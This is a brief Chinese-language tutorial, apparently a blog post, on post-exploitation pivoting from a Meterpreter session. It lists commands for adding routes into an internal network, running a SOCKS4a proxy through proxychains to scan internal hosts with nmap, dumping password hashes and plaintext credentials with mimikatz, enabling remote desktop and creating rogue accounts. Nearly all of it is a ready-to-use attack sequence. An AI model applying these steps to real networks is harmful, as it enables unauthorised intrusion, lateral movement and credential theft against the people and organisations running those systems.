1. 前置工作
拿到meterpreter
2. 查看路由信息
获取网卡信息 ifconfig
路由信息(获取在线网段) run get_local_subnets
3. 增加路由
run autoroute -s ip/子网掩码
或者用最新的模块: run post/multi/manage/autoroute session=1
run autoroute -p 查看在线路由
background
4. 使用sock4代理
use auxiliary/server/socks4a
show options
set SRVPORT 自定义的端口
run
5. 修改配置文件
修改proxychains.conf文件,注释掉底部的所有sock4和5,新建一个:
socks4 攻击机ip 上一步自定义的端口。
6. 启动扫描命令
proxychains nmap -sT -Pn 待扫描的内网地址
7. 一些补充
增加路由和添加隧道的区别在于,增加路由操作简易,但是没法反向连接,这就意味着反弹操作没法执行(最明显的就是没法反弹shell),此时可以使用windows/meterpreter/bind_tcp(show payloads)
密码收集,获取密码工具(mimikatz,在meterpreter中使用):
load mimikatz
help mimikatz
msv 导出hash值和证书
kerberos (高权限获取明文)
开启3389:
run getgui -e
尝试创建账号密码:
run getgui -u 账号-p 密码
浙公网安备 33010602011771号